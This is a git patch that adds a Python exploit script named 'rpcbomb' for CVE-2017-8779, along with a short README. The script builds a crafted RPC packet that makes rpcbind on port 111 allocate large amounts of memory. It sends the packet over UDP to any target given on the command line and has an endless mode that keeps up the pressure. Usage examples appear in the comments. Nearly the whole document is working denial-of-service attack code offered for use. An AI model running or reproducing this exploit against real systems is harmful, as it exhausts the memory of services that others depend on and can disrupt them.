From e20926dc95c834bafc7d7a035617142f1fb2fdd2 Mon Sep 17 00:00:00 2001 From: dash Date: Fri, 2 Jun 2017 09:28:39 +0200 Subject: [PATCH] CVE-2017-8779 --- CVE-2017-8779_rpcbomb.py | 83 ++++++++++++++++++++++++++++++++++++++++ README.md | 5 +++ 2 files changed, 88 insertions(+) create mode 100755 CVE-2017-8779_rpcbomb.py create mode 100644 README.md diff --git a/CVE-2017-8779_rpcbomb.py b/CVE-2017-8779_rpcbomb.py new file mode 100755 index 0000000..61789f9 --- /dev/null +++ b/CVE-2017-8779_rpcbomb.py @@ -0,0 +1,83 @@ +#!/usr/bin/env python2 +# +# CVE-2017-8779 aka rpcbomb.py +# python implementation of rpcbomb +# find page of bug author here: https://guidovranken.wordpress.com/ +# original ruby exploit: https://www.exploit-db.com/exploits/41974 +# CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779 +# +# this one comes with loop and single packet, to consume memory over time and not just once +# +# i was not able to observe any sort of crash or alike +# on the testsystem the cpu consumption went up to 50% (1 CPU) +# memory allocation was done +# syslogd reportedly mentions out of memory from rpcbind +# depending on the environment and service offered probably interesting +# +# one packet +# ./rpcbomb.py -t 127.0.0.1 +# +# define memory allocation +# ./rpcbomb.py -t 127.0.0.1 -l 1024 +# +# endless mode +# ./rpcbomb.py -t 127.0.0.1 -e +# +# 2nd June 2017 +# by dash + +import os +import sys +import struct +import socket +import argparse + +def run(args): + + ip = args.ip + paylen = args.malloc + port = args.port + + pkt = struct.pack('!I',0) # xid + pkt += struct.pack('!I',0) # message type CALL + pkt += struct.pack('!I',2) # RPC version 2 + pkt += struct.pack('!I',100000) # Program + pkt += struct.pack('!I',4) # Program version + pkt += struct.pack('!I',9) # Procedure + pkt += struct.pack('!I',0) # Creds AUTH_NULL + pkt += struct.pack('!I',0) # Creds len 0 + pkt += struct.pack('!I',0) # Creds AUTH_NULL + pkt += struct.pack('!I',0) # Creds len 0 + pkt += struct.pack('!I',0) # Program: 0 + pkt += struct.pack('!I',0) # Ver + pkt += struct.pack('!I',4) # Proc + pkt += struct.pack('!I',4) # Argument length + pkt += struct.pack('!I',paylen) # Payloadlen + + while 1: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.sendto(pkt, (ip, port)) + data, addr = s.recvfrom(16384) + print '.', + sys.stdout.flush() + if not args.endless: + break + + print + print 'Done' + +def main(): + parser_desc = 'rpcbomb - python exploit by dash' + prog_desc = 'portbind memory exhaustion exploit' + parser = argparse.ArgumentParser(prog = prog_desc, description=parser_desc) + parser.add_argument("-t","--target",action="store",required=True,help='host to send exploit',dest='ip') + parser.add_argument("-p","--port",action="store",required=False,help='port exploit to send to',dest='port', default=111, type=int) + parser.add_argument("-l","--len",action="store",required=False,help='memory to allocate',dest='malloc',default=4294967295, type=int) + parser.add_argument("-e","--endless",action="store_true",required=False,help='send packets constantly',dest='endless') + + + args = parser.parse_args() + run(args) + +if __name__ == "__main__": + main() diff --git a/README.md b/README.md new file mode 100644 index 0000000..7ebeaf9 --- /dev/null +++ b/README.md @@ -0,0 +1,5 @@ +# Exploits DoS + +CVE-2017-8779 aka rpcbomb.py + +rpcbind 111 memory allocation exploit